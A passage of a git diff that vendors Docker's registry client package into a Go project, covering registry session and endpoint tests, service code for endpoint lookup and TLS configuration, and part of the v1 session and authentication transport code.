+		t.Fatal("Pull endpoint should contain mirror")
+	}
+}
+
+func TestPushRegistryTag(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	repoRef, err := reference.ParseNamed(REPO)
+	if err != nil {
+		t.Fatal(err)
+	}
+	err = r.PushRegistryTag(repoRef, imageID, "stable", makeURL("/v1/"))
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestPushImageJSONIndex(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	imgData := []*ImgData{
+		{
+			ID:       "77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20",
+			Checksum: "sha256:1ac330d56e05eef6d438586545ceff7550d3bdcb6b19961f12c5ba714ee1bb37",
+		},
+		{
+			ID:       "42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d",
+			Checksum: "sha256:bea7bf2e4bacd479344b737328db47b18880d09096e6674165533aa994f5e9f2",
+		},
+	}
+	repoRef, err := reference.ParseNamed(REPO)
+	if err != nil {
+		t.Fatal(err)
+	}
+	repoData, err := r.PushImageJSONIndex(repoRef, imgData, false, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if repoData == nil {
+		t.Fatal("Expected RepositoryData object")
+	}
+	repoData, err = r.PushImageJSONIndex(repoRef, imgData, true, []string{r.indexEndpoint.String()})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if repoData == nil {
+		t.Fatal("Expected RepositoryData object")
+	}
+}
+
+func TestSearchRepositories(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	results, err := r.SearchRepositories("fakequery", 25)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if results == nil {
+		t.Fatal("Expected non-nil SearchResults object")
+	}
+	assertEqual(t, results.NumResults, 1, "Expected 1 search results")
+	assertEqual(t, results.Query, "fakequery", "Expected 'fakequery' as query")
+	assertEqual(t, results.Results[0].StarCount, 42, "Expected 'fakeimage' to have 42 stars")
+}
+
+func TestTrustedLocation(t *testing.T) {
+	for _, url := range []string{"http://example.com", "https://example.com:7777", "http://docker.io", "http://test.docker.com", "https://fakedocker.com"} {
+		req, _ := http.NewRequest("GET", url, nil)
+		if trustedLocation(req) == true {
+			t.Fatalf("'%s' shouldn't be detected as a trusted location", url)
+		}
+	}
+
+	for _, url := range []string{"https://docker.io", "https://test.docker.com:80"} {
+		req, _ := http.NewRequest("GET", url, nil)
+		if trustedLocation(req) == false {
+			t.Fatalf("'%s' should be detected as a trusted location", url)
+		}
+	}
+}
+
+func TestAddRequiredHeadersToRedirectedRequests(t *testing.T) {
+	for _, urls := range [][]string{
+		{"http://docker.io", "https://docker.com"},
+		{"https://foo.docker.io:7777", "http://bar.docker.com"},
+		{"https://foo.docker.io", "https://example.com"},
+	} {
+		reqFrom, _ := http.NewRequest("GET", urls[0], nil)
+		reqFrom.Header.Add("Content-Type", "application/json")
+		reqFrom.Header.Add("Authorization", "super_secret")
+		reqTo, _ := http.NewRequest("GET", urls[1], nil)
+
+		addRequiredHeadersToRedirectedRequests(reqTo, []*http.Request{reqFrom})
+
+		if len(reqTo.Header) != 1 {
+			t.Fatalf("Expected 1 headers, got %d", len(reqTo.Header))
+		}
+
+		if reqTo.Header.Get("Content-Type") != "application/json" {
+			t.Fatal("'Content-Type' should be 'application/json'")
+		}
+
+		if reqTo.Header.Get("Authorization") != "" {
+			t.Fatal("'Authorization' should be empty")
+		}
+	}
+
+	for _, urls := range [][]string{
+		{"https://docker.io", "https://docker.com"},
+		{"https://foo.docker.io:7777", "https://bar.docker.com"},
+	} {
+		reqFrom, _ := http.NewRequest("GET", urls[0], nil)
+		reqFrom.Header.Add("Content-Type", "application/json")
+		reqFrom.Header.Add("Authorization", "super_secret")
+		reqTo, _ := http.NewRequest("GET", urls[1], nil)
+
+		addRequiredHeadersToRedirectedRequests(reqTo, []*http.Request{reqFrom})
+
+		if len(reqTo.Header) != 2 {
+			t.Fatalf("Expected 2 headers, got %d", len(reqTo.Header))
+		}
+
+		if reqTo.Header.Get("Content-Type") != "application/json" {
+			t.Fatal("'Content-Type' should be 'application/json'")
+		}
+
+		if reqTo.Header.Get("Authorization") != "super_secret" {
+			t.Fatal("'Authorization' should be 'super_secret'")
+		}
+	}
+}
+
+func TestIsSecureIndex(t *testing.T) {
+	tests := []struct {
+		addr               string
+		insecureRegistries []string
+		expected           bool
+	}{
+		{IndexName, nil, true},
+		{"example.com", []string{}, true},
+		{"example.com", []string{"example.com"}, false},
+		{"localhost", []string{"localhost:5000"}, false},
+		{"localhost:5000", []string{"localhost:5000"}, false},
+		{"localhost", []string{"example.com"}, false},
+		{"127.0.0.1:5000", []string{"127.0.0.1:5000"}, false},
+		{"localhost", nil, false},
+		{"localhost:5000", nil, false},
+		{"127.0.0.1", nil, false},
+		{"localhost", []string{"example.com"}, false},
+		{"127.0.0.1", []string{"example.com"}, false},
+		{"example.com", nil, true},
+		{"example.com", []string{"example.com"}, false},
+		{"127.0.0.1", []string{"example.com"}, false},
+		{"127.0.0.1:5000", []string{"example.com"}, false},
+		{"example.com:5000", []string{"42.42.0.0/16"}, false},
+		{"example.com", []string{"42.42.0.0/16"}, false},
+		{"example.com:5000", []string{"42.42.42.42/8"}, false},
+		{"127.0.0.1:5000", []string{"127.0.0.0/8"}, false},
+		{"42.42.42.42:5000", []string{"42.1.1.1/8"}, false},
+		{"invalid.domain.com", []string{"42.42.0.0/16"}, true},
+		{"invalid.domain.com", []string{"invalid.domain.com"}, false},
+		{"invalid.domain.com:5000", []string{"invalid.domain.com"}, true},
+		{"invalid.domain.com:5000", []string{"invalid.domain.com:5000"}, false},
+	}
+	for _, tt := range tests {
+		config := makeServiceConfig(nil, tt.insecureRegistries)
+		if sec := isSecureIndex(config, tt.addr); sec != tt.expected {
+			t.Errorf("isSecureIndex failed for %q %v, expected %v got %v", tt.addr, tt.insecureRegistries, tt.expected, sec)
+		}
+	}
+}
+
+type debugTransport struct {
+	http.RoundTripper
+	log func(...interface{})
+}
+
+func (tr debugTransport) RoundTrip(req *http.Request) (*http.Response, error) {
+	dump, err := httputil.DumpRequestOut(req, false)
+	if err != nil {
+		tr.log("could not dump request")
+	}
+	tr.log(string(dump))
+	resp, err := tr.RoundTripper.RoundTrip(req)
+	if err != nil {
+		return nil, err
+	}
+	dump, err = httputil.DumpResponse(resp, false)
+	if err != nil {
+		tr.log("could not dump response")
+	}
+	tr.log(string(dump))
+	return resp, err
+}
diff --git a/vendor/github.com/docker/docker/registry/service.go b/vendor/github.com/docker/docker/registry/service.go
new file mode 100644
index 0000000000..596a9c7e5f
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/service.go
@@ -0,0 +1,304 @@
+package registry
+
+import (
+	"crypto/tls"
+	"fmt"
+	"net/http"
+	"net/url"
+	"strings"
+	"sync"
+
+	"golang.org/x/net/context"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/registry/client/auth"
+	"github.com/docker/docker/api/types"
+	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/reference"
+)
+
+const (
+	// DefaultSearchLimit is the default value for maximum number of returned search results.
+	DefaultSearchLimit = 25
+)
+
+// Service is the interface defining what a registry service should implement.
+type Service interface {
+	Auth(ctx context.Context, authConfig *types.AuthConfig, userAgent string) (status, token string, err error)
+	LookupPullEndpoints(hostname string) (endpoints []APIEndpoint, err error)
+	LookupPushEndpoints(hostname string) (endpoints []APIEndpoint, err error)
+	ResolveRepository(name reference.Named) (*RepositoryInfo, error)
+	Search(ctx context.Context, term string, limit int, authConfig *types.AuthConfig, userAgent string, headers map[string][]string) (*registrytypes.SearchResults, error)
+	ServiceConfig() *registrytypes.ServiceConfig
+	TLSConfig(hostname string) (*tls.Config, error)
+	LoadInsecureRegistries([]string) error
+}
+
+// DefaultService is a registry service. It tracks configuration data such as a list
+// of mirrors.
+type DefaultService struct {
+	config *serviceConfig
+	mu     sync.Mutex
+}
+
+// NewService returns a new instance of DefaultService ready to be
+// installed into an engine.
+func NewService(options ServiceOptions) *DefaultService {
+	return &DefaultService{
+		config: newServiceConfig(options),
+	}
+}
+
+// ServiceConfig returns the public registry service configuration.
+func (s *DefaultService) ServiceConfig() *registrytypes.ServiceConfig {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	servConfig := registrytypes.ServiceConfig{
+		InsecureRegistryCIDRs: make([]*(registrytypes.NetIPNet), 0),
+		IndexConfigs:          make(map[string]*(registrytypes.IndexInfo)),
+		Mirrors:               make([]string, 0),
+	}
+
+	// construct a new ServiceConfig which will not retrieve s.Config directly,
+	// and look up items in s.config with mu locked
+	servConfig.InsecureRegistryCIDRs = append(servConfig.InsecureRegistryCIDRs, s.config.ServiceConfig.InsecureRegistryCIDRs...)
+
+	for key, value := range s.config.ServiceConfig.IndexConfigs {
+		servConfig.IndexConfigs[key] = value
+	}
+
+	servConfig.Mirrors = append(servConfig.Mirrors, s.config.ServiceConfig.Mirrors...)
+
+	return &servConfig
+}
+
+// LoadInsecureRegistries loads insecure registries for Service
+func (s *DefaultService) LoadInsecureRegistries(registries []string) error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	return s.config.LoadInsecureRegistries(registries)
+}
+
+// Auth contacts the public registry with the provided credentials,
+// and returns OK if authentication was successful.
+// It can be used to verify the validity of a client's credentials.
+func (s *DefaultService) Auth(ctx context.Context, authConfig *types.AuthConfig, userAgent string) (status, token string, err error) {
+	// TODO Use ctx when searching for repositories
+	serverAddress := authConfig.ServerAddress
+	if serverAddress == "" {
+		serverAddress = IndexServer
+	}
+	if !strings.HasPrefix(serverAddress, "https://") && !strings.HasPrefix(serverAddress, "http://") {
+		serverAddress = "https://" + serverAddress
+	}
+	u, err := url.Parse(serverAddress)
+	if err != nil {
+		return "", "", fmt.Errorf("unable to parse server address: %v", err)
+	}
+
+	endpoints, err := s.LookupPushEndpoints(u.Host)
+	if err != nil {
+		return "", "", err
+	}
+
+	for _, endpoint := range endpoints {
+		login := loginV2
+		if endpoint.Version == APIVersion1 {
+			login = loginV1
+		}
+
+		status, token, err = login(authConfig, endpoint, userAgent)
+		if err == nil {
+			return
+		}
+		if fErr, ok := err.(fallbackError); ok {
+			err = fErr.err
+			logrus.Infof("Error logging in to %s endpoint, trying next endpoint: %v", endpoint.Version, err)
+			continue
+		}
+		return "", "", err
+	}
+
+	return "", "", err
+}
+
+// splitReposSearchTerm breaks a search term into an index name and remote name
+func splitReposSearchTerm(reposName string) (string, string) {
+	nameParts := strings.SplitN(reposName, "/", 2)
+	var indexName, remoteName string
+	if len(nameParts) == 1 || (!strings.Contains(nameParts[0], ".") &&
+		!strings.Contains(nameParts[0], ":") && nameParts[0] != "localhost") {
+		// This is a Docker Index repos (ex: samalba/hipache or ubuntu)
+		// 'docker.io'
+		indexName = IndexName
+		remoteName = reposName
+	} else {
+		indexName = nameParts[0]
+		remoteName = nameParts[1]
+	}
+	return indexName, remoteName
+}
+
+// Search queries the public registry for images matching the specified
+// search terms, and returns the results.
+func (s *DefaultService) Search(ctx context.Context, term string, limit int, authConfig *types.AuthConfig, userAgent string, headers map[string][]string) (*registrytypes.SearchResults, error) {
+	// TODO Use ctx when searching for repositories
+	if err := validateNoScheme(term); err != nil {
+		return nil, err
+	}
+
+	indexName, remoteName := splitReposSearchTerm(term)
+
+	// Search is a long-running operation, just lock s.config to avoid block others.
+	s.mu.Lock()
+	index, err := newIndexInfo(s.config, indexName)
+	s.mu.Unlock()
+
+	if err != nil {
+		return nil, err
+	}
+
+	// *TODO: Search multiple indexes.
+	endpoint, err := NewV1Endpoint(index, userAgent, http.Header(headers))
+	if err != nil {
+		return nil, err
+	}
+
+	var client *http.Client
+	if authConfig != nil && authConfig.IdentityToken != "" && authConfig.Username != "" {
+		creds := NewStaticCredentialStore(authConfig)
+		scopes := []auth.Scope{
+			auth.RegistryScope{
+				Name:    "catalog",
+				Actions: []string{"search"},
+			},
+		}
+
+		modifiers := DockerHeaders(userAgent, nil)
+		v2Client, foundV2, err := v2AuthHTTPClient(endpoint.URL, endpoint.client.Transport, modifiers, creds, scopes)
+		if err != nil {
+			if fErr, ok := err.(fallbackError); ok {
+				logrus.Errorf("Cannot use identity token for search, v2 auth not supported: %v", fErr.err)
+			} else {
+				return nil, err
+			}
+		} else if foundV2 {
+			// Copy non transport http client features
+			v2Client.Timeout = endpoint.client.Timeout
+			v2Client.CheckRedirect = endpoint.client.CheckRedirect
+			v2Client.Jar = endpoint.client.Jar
+
+			logrus.Debugf("using v2 client for search to %s", endpoint.URL)
+			client = v2Client
+		}
+	}
+
+	if client == nil {
+		client = endpoint.client
+		if err := authorizeClient(client, authConfig, endpoint); err != nil {
+			return nil, err
+		}
+	}
+
+	r := newSession(client, authConfig, endpoint)
+
+	if index.Official {
+		localName := remoteName
+		if strings.HasPrefix(localName, "library/") {
+			// If pull "library/foo", it's stored locally under "foo"
+			localName = strings.SplitN(localName, "/", 2)[1]
+		}
+
+		return r.SearchRepositories(localName, limit)
+	}
+	return r.SearchRepositories(remoteName, limit)
+}
+
+// ResolveRepository splits a repository name into its components
+// and configuration of the associated registry.
+func (s *DefaultService) ResolveRepository(name reference.Named) (*RepositoryInfo, error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	return newRepositoryInfo(s.config, name)
+}
+
+// APIEndpoint represents a remote API endpoint
+type APIEndpoint struct {
+	Mirror       bool
+	URL          *url.URL
+	Version      APIVersion
+	Official     bool
+	TrimHostname bool
+	TLSConfig    *tls.Config
+}
+
+// ToV1Endpoint returns a V1 API endpoint based on the APIEndpoint
+func (e APIEndpoint) ToV1Endpoint(userAgent string, metaHeaders http.Header) (*V1Endpoint, error) {
+	return newV1Endpoint(*e.URL, e.TLSConfig, userAgent, metaHeaders)
+}
+
+// TLSConfig constructs a client TLS configuration based on server defaults
+func (s *DefaultService) TLSConfig(hostname string) (*tls.Config, error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	return newTLSConfig(hostname, isSecureIndex(s.config, hostname))
+}
+
+// tlsConfig constructs a client TLS configuration based on server defaults
+func (s *DefaultService) tlsConfig(hostname string) (*tls.Config, error) {
+	return newTLSConfig(hostname, isSecureIndex(s.config, hostname))
+}
+
+func (s *DefaultService) tlsConfigForMirror(mirrorURL *url.URL) (*tls.Config, error) {
+	return s.tlsConfig(mirrorURL.Host)
+}
+
+// LookupPullEndpoints creates a list of endpoints to try to pull from, in order of preference.
+// It gives preference to v2 endpoints over v1, mirrors over the actual
+// registry, and HTTPS over plain HTTP.
+func (s *DefaultService) LookupPullEndpoints(hostname string) (endpoints []APIEndpoint, err error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	return s.lookupEndpoints(hostname)
+}
+
+// LookupPushEndpoints creates a list of endpoints to try to push to, in order of preference.
+// It gives preference to v2 endpoints over v1, and HTTPS over plain HTTP.
+// Mirrors are not included.
+func (s *DefaultService) LookupPushEndpoints(hostname string) (endpoints []APIEndpoint, err error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	allEndpoints, err := s.lookupEndpoints(hostname)
+	if err == nil {
+		for _, endpoint := range allEndpoints {
+			if !endpoint.Mirror {
+				endpoints = append(endpoints, endpoint)
+			}
+		}
+	}
+	return endpoints, err
+}
+
+func (s *DefaultService) lookupEndpoints(hostname string) (endpoints []APIEndpoint, err error) {
+	endpoints, err = s.lookupV2Endpoints(hostname)
+	if err != nil {
+		return nil, err
+	}
+
+	if s.config.V2Only {
+		return endpoints, nil
+	}
+
+	legacyEndpoints, err := s.lookupV1Endpoints(hostname)
+	if err != nil {
+		return nil, err
+	}
+	endpoints = append(endpoints, legacyEndpoints...)
+
+	return endpoints, nil
+}
diff --git a/vendor/github.com/docker/docker/registry/service_v1.go b/vendor/github.com/docker/docker/registry/service_v1.go
new file mode 100644
index 0000000000..1d251aec6e
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/service_v1.go
@@ -0,0 +1,40 @@
+package registry
+
+import "net/url"
+
+func (s *DefaultService) lookupV1Endpoints(hostname string) (endpoints []APIEndpoint, err error) {
+	if hostname == DefaultNamespace || hostname == DefaultV2Registry.Host || hostname == IndexHostname {
+		return []APIEndpoint{}, nil
+	}
+
+	tlsConfig, err := s.tlsConfig(hostname)
+	if err != nil {
+		return nil, err
+	}
+
+	endpoints = []APIEndpoint{
+		{
+			URL: &url.URL{
+				Scheme: "https",
+				Host:   hostname,
+			},
+			Version:      APIVersion1,
+			TrimHostname: true,
+			TLSConfig:    tlsConfig,
+		},
+	}
+
+	if tlsConfig.InsecureSkipVerify {
+		endpoints = append(endpoints, APIEndpoint{ // or this
+			URL: &url.URL{
+				Scheme: "http",
+				Host:   hostname,
+			},
+			Version:      APIVersion1,
+			TrimHostname: true,
+			// used to check if supposed to be secure via InsecureSkipVerify
+			TLSConfig: tlsConfig,
+		})
+	}
+	return endpoints, nil
+}
diff --git a/vendor/github.com/docker/docker/registry/service_v1_test.go b/vendor/github.com/docker/docker/registry/service_v1_test.go
new file mode 100644
index 0000000000..bd15dfffb8
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/service_v1_test.go
@@ -0,0 +1,23 @@
+package registry
+
+import "testing"
+
+func TestLookupV1Endpoints(t *testing.T) {
+	s := NewService(ServiceOptions{})
+
+	cases := []struct {
+		hostname    string
+		expectedLen int
+	}{
+		{"example.com", 1},
+		{DefaultNamespace, 0},
+		{DefaultV2Registry.Host, 0},
+		{IndexHostname, 0},
+	}
+
+	for _, c := range cases {
+		if ret, err := s.lookupV1Endpoints(c.hostname); err != nil || len(ret) != c.expectedLen {
+			t.Errorf("lookupV1Endpoints(`"+c.hostname+"`) returned %+v and %+v", ret, err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/registry/service_v2.go b/vendor/github.com/docker/docker/registry/service_v2.go
new file mode 100644
index 0000000000..228d745f8c
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/service_v2.go
@@ -0,0 +1,78 @@
+package registry
+
+import (
+	"net/url"
+	"strings"
+
+	"github.com/docker/go-connections/tlsconfig"
+)
+
+func (s *DefaultService) lookupV2Endpoints(hostname string) (endpoints []APIEndpoint, err error) {
+	tlsConfig := tlsconfig.ServerDefault()
+	if hostname == DefaultNamespace || hostname == IndexHostname {
+		// v2 mirrors
+		for _, mirror := range s.config.Mirrors {
+			if !strings.HasPrefix(mirror, "http://") && !strings.HasPrefix(mirror, "https://") {
+				mirror = "https://" + mirror
+			}
+			mirrorURL, err := url.Parse(mirror)
+			if err != nil {
+				return nil, err
+			}
+			mirrorTLSConfig, err := s.tlsConfigForMirror(mirrorURL)
+			if err != nil {
+				return nil, err
+			}
+			endpoints = append(endpoints, APIEndpoint{
+				URL: mirrorURL,
+				// guess mirrors are v2
+				Version:      APIVersion2,
+				Mirror:       true,
+				TrimHostname: true,
+				TLSConfig:    mirrorTLSConfig,
+			})
+		}
+		// v2 registry
+		endpoints = append(endpoints, APIEndpoint{
+			URL:          DefaultV2Registry,
+			Version:      APIVersion2,
+			Official:     true,
+			TrimHostname: true,
+			TLSConfig:    tlsConfig,
+		})
+
+		return endpoints, nil
+	}
+
+	tlsConfig, err = s.tlsConfig(hostname)
+	if err != nil {
+		return nil, err
+	}
+
+	endpoints = []APIEndpoint{
+		{
+			URL: &url.URL{
+				Scheme: "https",
+				Host:   hostname,
+			},
+			Version:      APIVersion2,
+			TrimHostname: true,
+			TLSConfig:    tlsConfig,
+		},
+	}
+
+	if tlsConfig.InsecureSkipVerify {
+		endpoints = append(endpoints, APIEndpoint{
+			URL: &url.URL{
+				Scheme: "http",
+				Host:   hostname,
+			},
+			Version:      APIVersion2,
+			TrimHostname: true,
+			// used to check if supposed to be secure via InsecureSkipVerify
+			TLSConfig: tlsConfig,
+		})
+	}
+
+	return endpoints, nil
+}
diff --git a/vendor/github.com/docker/docker/registry/session.go b/vendor/github.com/docker/docker/registry/session.go
new file mode 100644
index 0000000000..72e286ab44
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/session.go
@@ -0,0 +1,783 @@
+package registry
+
+import (
+	"bytes"
+	"crypto/sha256"
+	"errors"
+	"sync"
+	// this is required for some certificates
+	_ "crypto/sha512"
+	"encoding/hex"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net/http"
+	"net/http/cookiejar"
+	"net/url"
+	"strconv"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/registry/api/errcode"
+	"github.com/docker/docker/api/types"
+	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/pkg/httputils"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/tarsum"
+	"github.com/docker/docker/reference"
+)
+
+var (
+	// ErrRepoNotFound is returned if the repository didn't exist on the
+	// remote side
+	ErrRepoNotFound = errors.New("Repository not found")
+)
+
+// A Session is used to communicate with a V1 registry
+type Session struct {
+	indexEndpoint *V1Endpoint
+	client        *http.Client
+	// TODO(tiborvass): remove authConfig
+	authConfig *types.AuthConfig
+	id         string
+}
+
+type authTransport struct {
+	http.RoundTripper
+	*types.AuthConfig
+
+	alwaysSetBasicAuth bool
+	token              []string
+
+	mu     sync.Mutex                      // guards modReq
+	modReq map[*http.Request]*http.Request // original -> modified
+}
+
+// AuthTransport handles the auth layer when communicating with a v1 registry (private or official)
+//
+// For private v1 registries, set alwaysSetBasicAuth to true.
+//
+// For the official v1 registry, if there isn't already an Authorization header in the request,
+// but there is an X-Docker-Token header set to true, then Basic Auth will be used to set the Authorization header.
+// After sending the request with the provided base http.RoundTripper, if an X-Docker-Token header, representing
+// a token, is present in the response, then it gets cached and sent in the Authorization header of all subsequent
+// requests.
+//
+// If the server sends a token without the client having requested it, it is ignored.
+//
+// This RoundTripper also has a CancelRequest method important for correct timeout handling.
+func AuthTransport(base http.RoundTripper, authConfig *types.AuthConfig, alwaysSetBasicAuth bool) http.RoundTripper {
+	if base == nil {
+		base = http.DefaultTransport
+	}
+	return &authTransport{
+		RoundTripper:       base,
+		AuthConfig:         authConfig,
+		alwaysSetBasicAuth: alwaysSetBasicAuth,
+		modReq:             make(map[*http.Request]*http.Request),
+	}
+}
+
+// cloneRequest returns a clone of the provided *http.Request.
+// The clone is a shallow copy of the struct and its Header map.
+func cloneRequest(r *http.Request) *http.Request {
+	// shallow copy of the struct
+	r2 := new(http.Request)
+	*r2 = *r
+	// deep copy of the Header
+	r2.Header = make(http.Header, len(r.Header))
+	for k, s := range r.Header {
+		r2.Header[k] = append([]string(nil), s...)
+	}
+
+	return r2
+}
+
+// RoundTrip changes an HTTP request's headers to add the necessary
+// authentication-related headers
+func (tr *authTransport) RoundTrip(orig *http.Request) (*http.Response, error) {
+	// Authorization should not be set on 302 redirect for untrusted locations.
+	// This logic mirrors the behavior in addRequiredHeadersToRedirectedRequests.
+	// As the authorization logic is currently implemented in RoundTrip,
+	// a 302 redirect is detected by looking at the Referrer header as go http package adds said header.
+	// This is safe as Docker doesn't set Referrer in other scenarios.
+	if orig.Header.Get("Referer") != "" && !trustedLocation(orig) {
+		return tr.RoundTripper.RoundTrip(orig)
+	}
+
+	req := cloneRequest(orig)
+	tr.mu.Lock()
+	tr.modReq[orig] = req
+	tr.mu.Unlock()
+
+	if tr.alwaysSetBasicAuth {
+		if tr.AuthConfig == nil {
+			return nil, errors.New("unexpected error: empty auth config")
+		}
+		req.SetBasicAuth(tr.Username, tr.Password)
+		return tr.RoundTripper.RoundTrip(req)
+	}
+
+	// Don't override
+	if req.Header.Get("Authorization") == "" {
+		if req.Header.Get("X-Docker-Token") == "true" && tr.AuthConfig != nil && len(tr.Username) > 0 {
+			req.SetBasicAuth(tr.Username, tr.Password)
+		} else if len(tr.token) > 0 {
+			req.Header.Set("Authorization", "Token "+strings.Join(tr.token, ","))
+		}
+	}
+	resp, err := tr.RoundTripper.RoundTrip(req)
+	if err != nil {
+		delete(tr.modReq, orig)
+		return nil, err
+	}
+	if len(resp.Header["X-Docker-Token"]) > 0 {
+		tr.token = resp.Header["X-Docker-Token"]
+	}
+	resp.Body = &ioutils.OnEOFReader{
+		Rc: resp.Body,
+		Fn: func() {
+			tr.mu.Lock()
+			delete(tr.modReq, orig)
+			tr.mu.Unlock()
+		},
+	}
+	return resp, nil
+}
+
+// CancelRequest cancels an in-flight request by closing its connection.
+func (tr *authTransport) CancelRequest(req *http.Request) {
+	type canceler interface {
+		CancelRequest(*http.Request)
+	}
+	if cr, ok := tr.RoundTripper.(canceler); ok {
+		tr.mu.Lock()
+		modReq := tr.modReq[req]
+		delete(tr.modReq, req)
+		tr.mu.Unlock()
+		cr.CancelRequest(modReq)
+	}
+}
+
+func authorizeClient(client *http.Client, authConfig *types.AuthConfig, endpoint *V1Endpoint) error {
+	var alwaysSetBasicAuth bool
+
+	// If we're working with a standalone private registry over HTTPS, send Basic Auth headers
+	// alongside all our requests.
+	if endpoint.String() != IndexServer && endpoint.URL.Scheme == "https" {
+		info, err := endpoint.Ping()
+		if err != nil {
+			return err
+		}
+		if info.Standalone && authConfig != nil {
+			logrus.Debugf("Endpoint %s is eligible for private registry. Enabling decorator.", endpoint.String())
+			alwaysSetBasicAuth = true
+		}
+	}
+
+	// Annotate the transport unconditionally so that v2 can
+	// properly fallback on v1 when an image is not found.
+	client.Transport = AuthTransport(client.Transport, authConfig, alwaysSetBasicAuth)
+
+	jar, err := cookiejar.New(nil)
+	if err != nil {
+		return errors.New("cookiejar.New is not supposed to return an error")
+	}
+	client.Jar = jar
+
+	return nil
+}
+
+func newSession(client *http.Client, authConfig *types.AuthConfig, endpoint *V1Endpoint) *Session {
+	return &Session{
+		authConfig:    authConfig,
+		client:        client,
+		indexEndpoint: endpoint,
+		id:            stringid.GenerateRandomID(),
+	}
+}
+
+// NewSession creates a new session
+// TODO(tiborvass): remove authConfig param once registry client v2 is vendored
+func NewSession(client *http.Client, authConfig *types.AuthConfig, endpoint *V1Endpoint) (*Session, error) {
+	if err := authorizeClient(client, authConfig, endpoint); err != nil {
+		return nil, err
+	}
+
+	return newSession(client, authConfig, endpoint), nil
+}
+
+// ID returns this registry session's ID.
+func (r *Session) ID() string {
+	return r.id
+}
+
+// GetRemoteHistory retrieves the history of a given image from the registry.
+// It returns a list of the parent's JSON files (including the requested image).
+func (r *Session) GetRemoteHistory(imgID, registry string) ([]string, error) {
+	res, err := r.client.Get(registry + "images/" + imgID + "/ancestry")
+	if err != nil {
+		return nil, err
+	}
+	defer res.Body.Close()
+	if res.StatusCode != 200 {
+		if res.StatusCode == 401 {
+			return nil, errcode.ErrorCodeUnauthorized.WithArgs()
+		}
+		return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Server error: %d trying to fetch remote history for %s", res.StatusCode, imgID), res)
+	}
+
+	var history []string
+	if err := json.NewDecoder(res.Body).Decode(&history); err != nil {
+		return nil, fmt.Errorf("Error while reading the http response: %v", err)
+	}
+
+	logrus.Debugf("Ancestry: %v", history)
+	return history, nil
+}
+
+// LookupRemoteImage checks if an image exists in the registry
+func (r *Session) LookupRemoteImage(imgID, registry string) error {
+	res, err := r.client.Get(registry + "images/" + imgID + "/json")
+	if err != nil {
+		return err
+	}
+	res.Body.Close()
+	if res.StatusCode != 200 {
+		return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d", res.StatusCode), res)
+	}
+	return nil
+}
+
+// GetRemoteImageJSON retrieves an image's JSON metadata from the registry.
+func (r *Session) GetRemoteImageJSON(imgID, registry string) ([]byte, int64, error) {
+	res, err := r.client.Get(registry + "images/" + imgID + "/json")
+	if err != nil {
+		return nil, -1, fmt.Errorf("Failed to download json: %s", err)
+	}
+	defer res.Body.Close()
+	if res.StatusCode != 200 {
+		return nil, -1, httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d", res.StatusCode), res)
+	}
+	// if the size header is not present, then set it to '-1'
+	imageSize := int64(-1)
+	if hdr := res.Header.Get("X-Docker-Size"); hdr != "" {
+		imageSize, err = strconv.ParseInt(hdr, 10, 64)
+		if err != nil {
+			return nil, -1, err
+		}
+	}
+
+	jsonString, err := ioutil.ReadAll(res.Body)
+	if err != nil {
+		return nil, -1, fmt.Errorf("Failed to parse downloaded json: %v (%s)", err, jsonString)
+	}
+	return jsonString, imageSize, nil
+}
+
+// GetRemoteImageLayer retrieves an image layer from the registry
+func (r *Session) GetRemoteImageLayer(imgID, registry string, imgSize int64) (io.ReadCloser, error) {
+	var (
+		statusCode = 0
+		res        *http.Response
+		err        error
+		imageURL   = fmt.Sprintf("%simages/%s/layer", registry, imgID)
+	)
+
+	req, err := http.NewRequest("GET", imageURL, nil)
+	if err != nil {
+		return nil, fmt.Errorf("Error while getting from the server: %v", err)
+	}
+	statusCode = 0
+	res, err = r.client.Do(req)
+	if err != nil {
+		logrus.Debugf("Error contacting registry %s: %v", registry, err)
+		// the only case err != nil && res != nil is https://golang.org/src/net/http/client.go#L515
+		if res != nil {
+			if res.Body != nil {
+				res.Body.Close()
+			}
+			statusCode = res.StatusCode
+		}
+		return nil, fmt.Errorf("Server error: Status %d while fetching image layer (%s)",
+			statusCode, imgID)
+	}
+
+	if res.StatusCode != 200 {
+		res.Body.Close()
+		return nil, fmt.Errorf("Server error: Status %d while fetching image layer (%s)",
+			res.StatusCode, imgID)
+	}
+
+	if res.Header.Get("Accept-Ranges") == "bytes" && imgSize > 0 {
+		logrus.Debug("server supports resume")
+		return httputils.ResumableRequestReaderWithInitialResponse(r.client, req, 5, imgSize, res), nil
+	}
+	logrus.Debug("server doesn't support resume")
+	return res.Body, nil
+}
+
+// GetRemoteTag retrieves the tag named in the askedTag argument from the given
+// repository. It queries each of the registries supplied in the registries
+// argument, and returns data from the first one that answers the query
+// successfully.
